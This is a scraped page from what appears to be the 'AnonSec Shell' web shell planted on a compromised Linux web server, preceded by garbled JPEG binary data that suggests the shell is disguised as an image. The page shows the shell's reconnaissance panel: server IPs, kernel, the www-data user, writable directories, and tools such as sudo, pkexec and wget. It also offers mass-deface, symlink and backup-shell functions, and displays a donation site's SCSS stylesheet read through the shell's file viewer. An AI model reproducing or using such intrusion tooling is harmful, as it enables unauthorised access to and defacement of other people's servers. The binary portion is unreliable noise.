JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 172.67.142.142  /  Your IP : 104.23.197.30   [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/app/karina/prd/assets/scss/var/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/app/karina/prd/assets/scss/var/_detail.scss
.box-content-donasi {
    background-color: #fff;
    padding: 25px 40px;
    border-radius: 12px;
    position: relative;
    margin-top: -150px;
    color: #6A7B81;
    z-index: 2;
    &:before {
        content: "";
        position: absolute;
        z-index: 0;
        height: 10px;
        -webkit-border-top-left-radius: 10px;
        -webkit-border-top-right-radius: 10px;
        -moz-border-radius-topleft: 10px;
        -moz-border-radius-topright: 10px;
        border-top-left-radius: 10px;
        border-top-right-radius: 10px;
        background-color: #CAA231;
        top: -10px;
        display: block;
        width: 500px;
        left: 30%;
    }
    h1 {
        color: #865B22;
        font-size: 36px;
        font-weight: normal;
        margin-bottom: 20px;
    }
}
.title-2 {
    color: #000;
    font-weight: normal;
    font-size: 20px;
    padding-left: 20px;
    border-left: 3px solid #CAA231;
    margin-top: 50px;
    margin-bottom: 10px;
}
.form-donasi {
    background-color: #FAFAFA;
    padding: 30px 40px;
    border-radius: 8px;
    border: 1px solid #DEDEDE;
    position: relative;
    margin-top: -100px;
    .title-form {
        color:#EF4135;
        font-size: 22px;
        margin-bottom: 20px;
    }
    .form-group {
        input,
        textarea {
            display: block;
            background-color: #fff;
            border-radius: 8px;
            padding: 8px 14px;
            font-size: 14px;
            border:1px solid #DEDEDE;
            width: 100%;
        }
        .phone {
            background-color: #fff;
            border-radius: 8px;
            font-size: 14px;
            border:1px solid #DEDEDE;
            margin: 0;
            padding: 8px 14px;
            .kode {
                border-right: 1px solid #DEDEDE;
                padding-right: 10px;
            }
            input {
                background-color: none;
                border:none;
                padding: 0;
                outline: none;
            }
        }
    }
    &.form-edit {
        margin: 0;
        background: none;
        border: 0;
        .title {
            font-size: 32px;
            margin-bottom: 20px;
        }
    }
}
.hl-black {
    color: #fff;
    background-color: #000;
    background-image: url('../img/bg_black.jpg');
    background-position: top center;
    background-size: cover;
    padding-bottom: 100px;
}
.img-tiles {
    position: relative;
    margin-top: -200px;
    .box_img {
        border-radius: 12px;
        border:5px solid #fff;
        overflow: hidden;
        background-color: #fff;
        .img_con {
            border-radius: 12px;
            border:5px solid #fff;
        }
    }
    img {
        width: 100%;
    }
}
.box-donasi-detail {
    background-color: rgba($color: #fff, $alpha: 0.5);
    color: #000;
    padding: 20px;
    border-radius: 12px;
    .title {
        font-size: 20px;
        margin-bottom: 10px;
        margin-left: 5px;
    }
    h3 {
        font-size: 20px;
    }
    .card-donasi-2 {
        //margin: 0;
    }
    
}
.detail-program {
    .title-2 {
        margin-top: 0 !important;
    }
}
.detail-tentang {
    .section-2 {
        margin: 40px 0;
        h2 {
            font-size: 34px;
        }
        .desc {
            margin: 30px 0;
            font-size: 18px;
        }
    }
    .box-video {
        border: 10px solid #fff;
        border-radius: 12px;
    }
}
.section-visi-misi {
    background-image:url('../img/bg-red.jpg') ;
    background-position: left top;
    background-repeat: no-repeat;
    color: #fff;
    padding: 50px 0;
    -webkit-border-top-left-radius: 10px;
    -webkit-border-top-right-radius: 10px;
    -moz-border-radius-topleft: 10px;
    -moz-border-radius-topright: 10px;
    border-top-left-radius: 10px;
    border-top-right-radius: 10px;
    overflow: hidden;
    padding-bottom: 260px;
    .sub-title {
        color: #FDAAA4;
        font-size: 18px;
        margin-bottom: 20px;
    }
    .desc {
        font-size: 22px;
    }
    .desc_visi {
        font-size: 34px;
    }
}

.detail-contact {
    .box-phone {
        background-color: #fff;
        border-radius: 100px;
        margin-bottom: 20px;
        color: #865B22;
        display: inline-block;
        padding: 10px;
        padding-right: 30px;
        font-size: 20px;
        img {
            height: 25px;
            margin-right: 10px;
        }
    }
    .link-contact {
        display: block;
        margin: 5px 0;
        color: #6A7B81;
        img {
            height: 30px;
            margin-right: 10px;
        }
        .icon {
            height: 40px;
        }
    }
    .sosmed {
        text-align: left;
        margin-right: 30px;
        margin-top: 10px;
        a {
            display: inline-block;
            height: 40px;
            margin: 0;
            margin-left: 10px;
            @include transition(0.3s);
            img {
                height: 100%;
            }
            &:hover {
                @include scale(1.2);
            }
        }
    }
    .form-donasi {
        margin-top: 0;
    }
}

.profile {
    padding-bottom: 100px;
    .avatar {
        width: 180px;
    }
    h1 {
        font-weight: normal;
        font-size: 32px;
        margin-top: 40px;
        margin-bottom: 10px;
    }
    .desc {
        color: #DEDEDE;
        margin-bottom: 20px;
    }
}
.box-white-donasi {
    background-color: #FAFAFA;
    padding: 40px;
    border-radius: 8px;
    position: relative;
    margin-top: -100px;
    z-index: 2;
    .title-box {
        color: #000;
        font-weight: normal;
        font-size: 20px;
        padding-left: 20px;
        border-left: 3px solid #CAA231;
        margin-bottom: 20px;
    }
}

.detail-news {
    .date {
        color: #EF4135;
    }
    .title-page-detail {
        font-size: 36px;
        color: #142F37;
        margin: 10px 0;
        text-align: left;
    }
    .author {
        color: #6A7B81;
        font-size: 18px;
    }
    .img_detail {
        margin: 20px 0;
        img {
            width: 100%;
            border-radius: 12px;
        }
    }
    .desc {
        color: #6A7B81;
        font-size: 18px;
        line-height: 140%;
    }
}
.box-num-donasi {
    .num {
        font-size: 30px;
    }
}
.detail-program {
    .desc {
        color: #6A7B81;
        font-size: 18px;
        list-style: 200%;
    }
}
.box-lihat-donasi {
    background-image: url('../img/box-lihat-donasi.jpg');
    background-color: #FBF8E9;
    background-size: cover;
    background-repeat: no-repeat;
    padding: 20px 50px 20px 30px;
    font-size: 18px;
    border-radius: 8px;
    display: block;
    width: calc(100% - 16px);
    margin: 8px;
    color: #000;
}

Anon7 - 2022
AnonSec Team